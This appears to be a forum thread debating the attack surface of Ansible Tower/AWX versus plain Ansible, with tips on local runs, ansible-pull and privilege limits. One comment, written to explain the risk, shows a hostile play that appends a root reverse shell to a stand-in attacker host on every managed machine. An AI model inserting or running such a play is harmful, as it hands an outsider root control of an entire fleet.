
If you're considering using this (or any similar) tool, please keep in mind that you're adding a lot of attack surface.

Your Ansible master is one of the most critical machines (if not the most critical) in your network. It has unrestricted access to everything, including a very detailed list of what and where everything is. If it's compromised, it's over.

Something like Ansible Tower adds a LOT of attack surface. Instead of a locked-down server exposing a public key-only SSH port, you suddenly have a whole web application stack in there. Your browser and every Chrome extension with full page access now has root access to your network (and don't get me started on potential CSRF or XSS vulnerabilities...).

If you don't need any of the enterprisey features, you might just be better off with plain Ansible and ARA[1], with the latter running on a separate machine. A "sudoers" rule is much more secure than any ACL in a web application backend.

If you do want to use Tower, you need to think about these risks and how you mitigate them. Of course, this also applies to any similar tool like Jenkins, Rundeck, CircleCI or whatever if you give them production credentials.

[1]: https://ara.readthedocs.io/en/latest/

Hi! I'm the author of ARA and just wanted to thank you for mentioning it :)

Full disclosure: I'm a Software Engineer at Red Hat.

Tower has a lot of great features, but I have to concede that it does come with some of the drawbacks you mentioned. I think it comes down to weighing the pros and cons, making sure you are aware of the cons, and putting measures in place to avoid problems.

It also heavily depends on your use case: Tower provides things like RBAC/ACL, auditing, scheduling, online editing and execution, an API, etc. If you happen to need none of that and you're perfectly happy just using Ansible from your command line, there's probably little incentive for you to use it.

If all you need is reporting, ARA is simple, easy to install and setup, doesn't get in your way and just records things transparently.

I figured I might as well take the opportunity to leave a video demo [1], even if it's a little outdated, as well as an example of the live reports that ARA provides [2].

Let me know if you have any questions!

[1]: https://www.youtube.com/watch?v=k3i8VPCanGo [2]: http://logs.openstack.org/21/474721/7/check/gate-openstack-a...

This is a great point. Although...other CI systems already have that kind of privilege, right? e.g. Chef has a master node if I'm not mistaken.

In my experience, ansible playbooks are great when run from a more general purpose task runner like jenkins, which then has permissions to access/modify one's production environment. I don't think I would personally use tower unless it provides something much much better than running ansible tasks in Jenkins... it would be just too much of a hassle to get the security/compliance aspects right.

Chef Server has a central server. Chef Zero doesn't, especially when using tools like cfn-init/cfn-hup and S3-backed minimart to self-bootstrap. This is the approach I take, and it's the approach I see becoming more and more common. Letting nodes figure out how to deal with their own problems (better able to auto-scale, more fault tolerant) is, to me, much better than having Jenkins or whatever have to SSH into them in the first place.

You can do it with Ansible, if you're going to home-roll it, but I haven't seen too many people do so.

Does anyone actually use Ansible server-less? Can it even be done?

(Edit: my bad, ignore this comment, I misphrased my question; the real question should have been: can you run Ansible locally on the target server, just like chef-solo/chef-zero?)

You can run Ansible locally with `-c local`.
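e.g., something like this (the playbook name is just a placeholder):

```shell
# No SSH, no remote controller: apply the playbook to this machine directly.
ansible-playbook -i 'localhost,' -c local playbook.yml
```

(The trailing comma in `'localhost,'` tells Ansible the inventory is a literal host list rather than a file.)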

But, as far as serverless/self-bootstrapping deploys go, it's less common. Ansible has less of a "culture of dependencies"; the simpler, more approachable-looking nature of the Ansible playbook format seems to lend itself to people one-offing whatever they need rather than looking for best-practices solutions that already exist. Because of this, there's no real Berkshelf equivalent for Ansible. The tooling doesn't exist, outside of Tower (sorta), because nobody wants it, and nobody wants it because the tooling doesn't exist. So the people who are doing something similar with Ansible to the Chef Zero stuff I mentioned above are mostly home-rolling it. (I just use an S3 bucket as a Minimart berkshelf endpoint and move on with my day.)

Last-mile configuration is also tricky. In my Chef Zero stuff, I use CloudFormation metadata to provide Chef attributes. You can do something similar with Ansible...but it's duct-tapey. There are times when simple is better; IMO, Ansible's core tooling errs too far on that side and the ecosystem has not caught up to make more rigorous approaches really viable.

Apologies if I'm wrong, but it sounds like you're not that familiar with Ansible's roles and the public Ansible Galaxy repo for them?


There are tons of roles available, for just about everything, and the quality isn't always great, but still higher on average than what I've found for most Chef recipes and Puppet modules.

And that's not to mention the very high number of high-quality modules that are built into Ansible.

I am familiar with them, yeah. In practice, across a pretty wide spread of clients, I have never seen them used or written by anyone who isn't me. This is why I referred to it as a culture problem; the tooling problem is the lack of a Berkshelf equivalent.

I would strongly, strongly disagree as to the quality of most Ansible modules that I have dealt with, but it's probably more based on exactly what you need than anything else.

Ansible was designed to be server-less from the beginning. Are you thinking of Chef or Puppet? Ansible Tower (which is the subject of this article) is a web application frontend for running Ansible.

On AWS, we bake our AMIs with packer and include the Ansible roles and playbooks.

We use CloudFormation to deploy, so in the instance metadata we have it run Ansible locally to bootstrap and return the exit status to cfn-signal.

We retrieve secrets via Parameter Store. For environment-specific configs that are not secrets (i.e. passing in vars from CloudFormation), we have cloud-init write a JSON file that we include with our ansible-playbook command.

The command ends up looking something like:

```shell
ansible-playbook -v -i 'localhost,' -c local /some/path/playbook.yml \
  --extra-vars '@/some/path/vars.json' \
  && /opt/aws/bin/cfn-signal -e $? --stack ${AWS::StackName} \
       --resource ${AsgName} --region ${AWS::Region}
```

Yes, my friend uses Ansible to store his work-PC configuration. After an upgrade/replacement he just installs git, Ansible and his private key, and then the rest of the setup is done by Ansible from a playbook in his private config repo.

In my mind, though, the biggest reason I used Ansible was its simple push-through-SSH nature. I knew that if there were maintenance tasks I would otherwise do by SSHing from my machine to some server, I could just as well create and run an Ansible playbook against it. This was especially useful for configuring ephemeral boxes spawned on e.g. OpenStack, where I know it will have SSH running and that is it.

we [1] do most of our AMI provisioning by booting a machine, checking out our ansible codebase and running `ansible-playbook -c local -i "localhost," ...` as part of cloud-init. Build progress is piped over SQS and a management process [2] waits for completion and triggers an AMI snapshot. It works well. I'm not sure if that's what you mean by "server-less", but in our use case there is no controller.

1. https://github.com/edx/configuration/ 2. https://github.com/edx/configuration/blob/master/util/vpc-to...

Hey Fred - I do believe we met when I was chatting with edX a little while back, funny seeing you around the internet. =) And yeah, this is much more of what I would describe as "serverless". It kind of sounds like what you're doing is pretty Packer-compatible; any particular reason you guys went the way you did?

For my purposes, Packer isn't always available, which is a bummer. The Chef Zero approach I described above is nice for my purposes because it works with either an AMI or a live instance; when I write cookbooks I break them into "bake" and "configure" recipes and sub-recipes, and the "bake" steps are effectively memoization of steps I also run (idempotently) when a machine comes up.

Yes, it can absolutely be done, but you'll need to build your own infrastructure. You just run the playbook locally using "-c local -i localhost,". Obviously, you'll have to figure out how to set variables and get the execution results back to the master.

It also means if any of your servers is compromised, the attacker will be in possession of your whole playbook.

> It also means if any of your servers is compromised, the attacker will be in possession of your whole playbook.

Which should, if you are designing your systems wisely, not matter at all, in any way, because configuration management systems should not contain secret or sensitive data (which should be provided from a more secure option--Credstash, Vault, whatever).

I could open-source all of my Chef cookbooks or Ansible playbooks and not have a security or correctness concern; this is pretty straightforward design.

Yes - you can either use your own tooling to distribute your playbooks to the hosts and then run ansible-playbook using the 'local' connection method, or you can use ansible-pull, which retrieves the playbooks from an SCM (git) repo and runs them locally. You don't need AWX/Tower for any of this.
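The pull side might look something like this (repo URL and playbook name are placeholders):

```shell
# Clone/refresh the playbook repo, then apply local.yml to this host.
# Typically wired into cron or cloud-init rather than run by hand.
ansible-pull -U https://git.example.com/ops/playbooks.git -i 'localhost,' local.yml
```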

Yes, I reprovisioned our dying Jenkins machine like this, because we usually run ansible from Jenkins. I was tweaking and updating the playbooks on the new Jenkins machine then running ansible there, then adding things that worked back into git.

Ansible also works well over ssh too. It’s pretty flexible.

Ansible is serverless by design - all you need to control a remote system is SSH access and python installed on the target.

Calling that "serverless" is something of an abuse of the term. You can call it "push-based" rather than "pull-based" (a Chef/Puppet model), but there is definitely a "server" to be had--it's the machine running SSH and with the canonical datastore. It is--and this is one of many reasons I don't like Ansible very much--just a pretty poor server and often the developer's workstation.

"Serverless" would be more like what I described with regards to Chef Zero, where a machine, as it bootstraps, is able to fetch its playbooks from somewhere and self-execute with some sort of sourceable configuration data. The standard Ansible workflow is not only not "serverless", but it is antithetical to cloud-friendly scaling and fault-tolerance practices. (Think about how you're going to manage auto-scaling groups with it. It hurts.)

There is no need to have a server at all. Any configuration can be run locally without ssh.

Sure! If you read the thread, you will notice that I explicitly describe how to do that. And that this post is not referring to doing that--it's explicitly referring to not doing that, instead doing remote provisioning via SSH. And, as a bonus, I went into some of the contributing factors that lead to people not doing it. So I'm not super sure why you felt compelled to reply?

You were right that your question was misphrased. Nobody seemed to understand what you were asking.

Do you happen to know of any fuller description, maybe a blog post, of the Chef Zero + minimart (etc.) setup? (Or, really, any similar setup.)

I'm having a bit of a hard time 'getting' the handling of secrets, etc. in such a setup.

(We're currently using Ansible, and frankly it's turned into a huge pain -- even on just a few hosts it's incredibly slow and horrible to debug. I'd really like to eventually transition to a more "build-a-pristine-base-system-image" + "update-itself-by-applying-more-recent-playbooks" type approach.)

No, but I can probably write one. We just use Credstash (rcredstash) for secrets and are done with it. (One of the nice things about not-using-Ansible is the lowered bar to entry of just pulling a library and writing the code you need.)

PLEASE write a decently detailed blog post about this! I and several other people would be eternally grateful.

I find that this is one of the most frustrating things about the Brave New World of immutable/container/VM/cloud/etc. It's actually REALLY hard to separate the hype from actual working things because all you seem to find is the hype and... 50 page "tutorials" on how to set Kubernetes[1] up.

[1] Random example, but the mere fact that they use a "simplified" admin program (minikube) for the tutorial tells me volumes about how fun it's going to be and how little administration it's going to require in production. /s

I'll see what I can do. But--would an online course do? Because I have written one, I just haven't recorded the voiceovers yet...

The fun part is, I think most of the sexy tools are lousy. Ansible demos well but works poorly; Terraform has bitten me so many times I don't trust it; Kubernetes doesn't make sense to me in a universe where I am buying already-provisioned-and-segmented resource bunches (we can call them "virtual machines", maybe) where I have to incur extra deadweight loss because fault-tolerance implies requiring extra space in case any existing node goes away.

I have spent enough time thinking about this that I am reasonably confident in my approach, and I would like to share it. It's a little more than a blog, though.

Assuming you can motivate it decently, I think a course might be good... However, that's quite a different value proposition, so it might take a bit to convince my employees to do it -- whereas an 'I read this series of articles by this very knowledgeable guy' doesn't require much convincin'.

To quote the infinite wisdom of The Simpsons: "Do what you feel" [is right]. :)

ansible-pull gives a similar workflow to chef-zero in an autoscaling environment.

There's also a balance to be struck between pre-baking AMIs and running config management at instance launch time.

Sure. But that's pretty awful. ansible-pull relies on a git repository, which relies on key provisioning, which means that you need to configuration-manage your configuration management and you don't have a stump-dumb, easy solution for it in any major cloud. And you have no dependency management (submodules, at best, are not dependency management), so I hope that you've vendored (which is gross) all of your dependencies.

This really is what I do for a living. I'm speaking from a position of entirely too extensive experience when I say that Ansible has no good solution here in common use. If I thought Ansible was good enough for me to be spending a lot of time with (it's not, and I advocate that clients not use it if they have a choice), I'd have probably already had to write it.

As far as machine images go, they are an optimization, not a core system. Your configuration management systems need to be able to bootstrap from either an AMI, to lay on last-mile (configuration, as opposed to setup, stuff) and converge any updates since the last AMI build, or to start from scratch. And that is another weakness of Ansible; writing idempotent Ansible scripts is significantly harder than it needs to be.

Tower is great for presenting playbooks to other users less familiar with Ansible. Besides, you have the same attack surface with Jenkins anyway.

And worse, in many places, due to most Jenkins instances (at least IMO) having dozens of plugins, many usually severely outdated.

Don't you have to give Jenkins the same credentials and attack surface that you would have had to give to AWX/Tower?

With the Jenkins model, can't someone just add a job that dumps the execution environment, and get all your credentials?

You are absolutely correct that these factors should be carefully considered prior to any deployment of AWX or Tower. You are granting Tower a lot of authority to your networks and systems, and should not do so without good reason. If you don't need the features of AWX/Tower, then the best practice is not to use it. There's a tremendous amount you can do with Ansible itself, without AWX/Tower, and lots of people use it happily that way.

That being said, I think you are overstating some of the risks. You don't need to grant every Tower user root access to everything on your network. If you're at a scale where Tower makes sense, you probably already have some sort of separation of privileges. I agree that a malicious Chrome extension could do a lot of damage - just like it could with all your other management tools like DRAC/ILO, network equipment GUIs and so forth. Yes, every web application carries the risk of CSRF/XSS or other vulnerabilities, and Tower is not immune to this, but we do spend a lot of time worrying about it, conducting audits, etc.

If your operation can succeed with nothing but a sudoers rule and command-line Ansible, then by all means use that. Nobody wants to force AWX/Tower on people who don't need it. But if you do need the feature set of Tower, I think it's one of the safer options available.

So, I've recently been evaluating AWX for my workplace. Thus, making sure it's secure is definitely important to me.

That said, I'm having a hard time seeing how a compromised browser with access to AWX could give anyone full access to everything. Attackers could affect anything a playbook has access to, but considering how varied playbooks are, it would be really hard to guess the right values to pass into a job to get what you want.

Can someone elaborate on how an attacker could do real damage using a browser based attack?

Simply add to any playbook a play with `all` hosts that drops your remote shell.
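A sketch of what that could look like (everything here is hypothetical: the file name, host and port are placeholders):

```shell
# Hypothetical attacker edit: append a play that targets every host.
# attacker.example.com:4444 is a placeholder; once this runs with root
# privileges, every machine the playbook reaches phones home with a shell.
cat >> site.yml <<'EOF'
- hosts: all
  become: true
  tasks:
    - name: drop a reverse shell
      shell: bash -i >& /dev/tcp/attacker.example.com/4444 0>&1
EOF
```

Note the payload doesn't need to guess any of your variables; `hosts: all` plus a raw `shell` task is enough.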

I had thought of the shell module. But the attacker would still have to know your playbook is using that module, and they'd have to know the variables you are passing into that module in order to override them.

So, can you explain how an attacker would figure that information out? Assuming the playbooks are stored in source control like the Tower docs recommend, and all your variable values are mostly in source control as well.

You would need source control access to do that.

Separate Chrome profile, no addons, proxied thru a dedicated VPN whose exit IP is the only one whitelisted by Tower or some reverse proxy in front of it. Or... just trust that of all the exploits someone could deliver to an addon, a specific attack on Tower will be pretty low on the list.

Yeah. What ^^ he said. Aside from how tightly locked down my localDev environment and development host are, I do hop into a sanitized Chrome profile (or just use an incognito window) when I'm doing things that require work through a GUI like the AWS console, Jenkins, GSuite Admin, etc...

Couple that with a sound architectural model, and you're good. Unless you're working on some super-duper top-secret stuff... but if we're talking about compliance and security at the CIS-standards level, to the best of your ability and knowledge, you should be good. Keep in mind, of course, that large, blanket vulns show their faces every so often - like the KRACK vuln - which renders all of our preparation and paranoia mostly null.

Example (of a neurotically paranoid architecture): a dedicated VPN resides in a dedicated AWS account and fronts all traffic to all hosts in all of your organization's accounts across AWS. The only services exposed publicly, other than your VPN service, are the public-facing services you run if you're hosting some SaaS, for example. Even then, your LBs better be public, and your EC2s behind them better be private. Yay port 443 and LB-to-instance certificate encryption.

Ansible Tower lives in some other "Internal Services" AWS account, and all traffic ingressed to hosts in that account is fronted by a bastion host and traffic proxy. The bastion/proxy is governed by a set of strict VPC route tables, and security groups that are set to only ever permit or accept traffic that corresponds to the IP addresses of your VPN.

If you wanna get even crazier than that, you can also strictly control egress rules for your security groups - so even if someone got in, they'd be hard pressed to get the data out of your systems without doing some acrobatics.

In general, if vulnerabilities at the Tower-server level are your concern, addressing that with architectural best practices and network-level controls for locking up access and traffic to Tower is reasonable and gets the job done. It would be the same as securing anything else sensitive running in your infra, like Jenkins or Rundeck.

I think RedHat's done an excellent job, and a huge service to the community by finally making good on their promise of open sourcing Tower.

> It has unrestricted access to everything

It only has unrestricted access to what you give it unrestricted access to.

If your ansible playbooks use a user that doesn't have root access and limited sudo powers, then it's not much different from using Ara.

That's fair, but Ansible culture is to do everything via sudo, and traditionally it was pretty painful to execute only portions of a playbook with sudo. Though it looks like that's gotten better in more recent times: http://docs.ansible.com/ansible/latest/become.html

Even if your playbooks run everything as sudo, that doesn't mean you have to grant AWX/Tower users the ability to create arbitrary playbooks or run anything else as sudo. You certainly can do that, but the point of the RBAC feature of Tower is that you don't have to.

The big improvement was the ability to turn sudo off/on for a particular task. Not sure when that was introduced. 1.9.something?
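For reference, a minimal sketch of what the per-task toggle looks like (the host group and module args are made up; the YAML is written to a file here just to keep the example self-contained):

```shell
cat > become-example.yml <<'EOF'
- hosts: webservers
  become: false            # play default: plain SSH user, no sudo
  tasks:
    - name: unprivileged check
      command: uptime

    - name: only this task escalates
      become: true         # per-task sudo toggle
      service:
        name: nginx
        state: restarted
EOF
```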

If you're using Ansible for configuration management, it'll need root access either way.

To do anything useful, you'd have to give it sudoer privs - this is true.

If you're squeamish about that, on principle, then Salt, Chef, and Puppet would be problematic as well. The only logical choice would be to provision and bake all of your images and push the AMI up to AWS...in which case Ansible would be an excellent utility anyway.

It doesn't need root access. It's just that most of the useful things to do on a server require root.

Maybe there should just be a trivial Electron wrapper around the Tower UI so that XSS/CSRF/extensions are not an issue.

Yeah, I've largely avoided using Tower for this reason, but you could theoretically get it up to an equivalent or at least comparable security level simply by SSH tunneling it or putting it behind a good VPN. Host compromise is still a risk even with ssh.

A tunnel does not protect against any of that. OP was already assuming it wasn't publicly accessible, or at least was ACL'd to your company's public IPs.

> Instead of a locked-down server exposing a public key-only SSH port, you suddenly have a whole web application stack in there.

There's no webapp stack to attack if you're only able to access it via a tunnel. If you're assuming the machine you're tunneling it to is compromised, there are bigger issues at play - ones that would compromise even a plain ssh link.

I'm talking a direct tunnel from your ansible master to the host you're planning to use it on, not say, into your company's network at large.

If you're always using `become_user: root` in your playbooks, maybe think about writing them differently! I have experience with Tower, and have never configured users to have any level of access beyond very, very basic SSH access.

Sure, but from an ops perspective you won't really be able to do much sysadmining without root privileges.

My method is to have an "app superuser": a user which is a group admin* for every group that I run apps as.

It can then do everything required with a few exceptions.

The exceptions are creating init/systemd files (associated startup/shutdown) and creating the necessary top-level directories for new apps.

Those can be allowed with a few careful sudo rules.

It can be a little convoluted but much more secure.

* "gpasswd -A <user>[,...] <group>"

Note: to be a group admin doesn't necessarily mean you're in that group; it means that you can put yourself in and out of that group as required.
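A rough sketch of the setup (usernames and groups are placeholders; needs root):

```shell
# Make 'appadmin' a group administrator of the 'webapps' group.
gpasswd -A appadmin webapps

# As a group admin, appadmin can then add or remove members on demand,
# without needing root:
#   gpasswd -a appadmin webapps   # put itself into the group
#   gpasswd -d appadmin webapps   # take itself out again
```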

You can mitigate part of the risks if you use an SSH tunnel to access Tower via port 22.
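For example (hostname and ports are placeholders):

```shell
# Forward a local port to Tower's HTTPS port over SSH; the web UI is then
# reachable only through the tunnel, at https://localhost:8443.
ssh -N -L 8443:localhost:443 admin@tower.internal.example.com
```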

Good points, though unlike some other similar apps, Ansible Tower has an SELinux policy.

Given the context, there's not a big difference between a website getting owned and an admin's browser getting owned. When someone develops an exploit that breaks out of sandbox, they can do whatever they want.

Also, this assumes access to Tower is unlimited. ACLs applied in Tower should be able to limit what user has what access.

All it takes is a compromised browser extension. Happens all the time:


And a compromised node.js dependency could own a non-browser-controlled install. But you don't have to use node.js apps, and you don't need to use browser extensions.

Sure, but now you'll need to make sure no one in your company who has full access to Tower is using browser extensions.

It's absolutely possible to use Ansible Tower securely, it just takes some effort.
